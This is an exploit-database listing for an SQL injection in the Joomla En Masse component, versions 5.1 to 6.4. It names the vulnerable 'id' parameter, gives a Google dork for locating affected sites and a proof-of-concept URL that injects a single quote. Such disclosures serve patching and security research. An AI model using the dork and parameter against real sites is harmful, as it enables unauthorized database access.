[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla En Masse (com_enmasse) 5.1 < 6.4 Component - SQL Injection

Author
Hamed Izadi
Risk
[
Security Risk High
]
0day-ID
0day-ID-25097
Category
web applications
Date add
15-06-2016
Platform
php
# Exploit Title: Joomla com_enmasse  - SQL Injection
  
               # Author: [ Hamed Izadi ]
 
                        #IRAN
 
# Vendor Homepage : http://extensions.joomla.org/extensions/extension/social-web/social-buy/en-masse
# Category: [ Webapps ]
# Tested on: [ Win ]
# Versions: 5.1-6.4
# Date: 2016/06/15
# Google Dork: inurl:component/enmasse/
 
 
# PoC:
# id Parameter Vulnerable To SQL
  
# Demo:
# http://server/component/enmasse/term?tmpl=component&id=2%27
 
 
# Youtube: https://youtu.be/LB5qVnXhzXE
 
#  L u Arg

#  0day.today [2024-11-15]  #